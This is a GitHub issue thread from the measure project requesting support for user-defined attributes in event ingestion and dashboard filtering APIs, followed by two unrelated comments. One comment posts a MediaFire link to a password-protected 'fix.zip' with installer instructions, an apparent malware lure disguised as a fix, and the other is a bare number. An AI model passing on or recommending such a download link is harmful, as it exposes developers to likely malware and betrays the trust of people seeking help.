### ISSUE TITLE
Support user defined attributes

### ISSUE THREAD

**Issue by detj** [measure-sh/measure#1143]
## Summary

Support user defined attributes in event ingestion and offer filtering via user defined attributes in various dashboard APIs. Make sure existing dashboard fetch APIs do not get impacted negatively.

## Tasks

- Figure out a decent schema architecture for user defined attributes
- Create ClickHouse migrations to add new columns for user defined attributes
- Update PUT `/events` API to read, validate, process and store user defined attributes
- Build a common comparison expression system that will apply to all APIs that filter using user defined attributes
- Update GET `/apps/:id/crashGroups/:id/crashes` API to return user defined attributes (if present)
- Update GET `/apps/:id/crashGroups/:id/plots/instances` to support filtering via user defined attributes
- Update GET `/apps/:id/crashGroups/:id/plots/journey` to support filtering via user defined attributes
- Update GET `/apps/:id/anrGroups/:id/anrs` API to return user defined attributes (if present)
- Update GET `/apps/:id/anrGroups/:id/plots/instances` to support filtering via user defined attributes
- Update GET `/apps/:id/anrGroups/:id/plots/journey` to support filtering via user defined attributes
- Update GET `/apps/:id/sessions/:id` API to return user defined attributes (if present)
- Update GET `/apps/:id/filters` API to return list of unique user defined attribute keys and their types
- Inject user defined attributes in session data events using random sampling and make sure event ingestion (via sessionator) works as expected
- :books: Update SDK API docs
- :books: Update dashboard API docs

## See Also

- #851

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenshupe** [comment]
1224
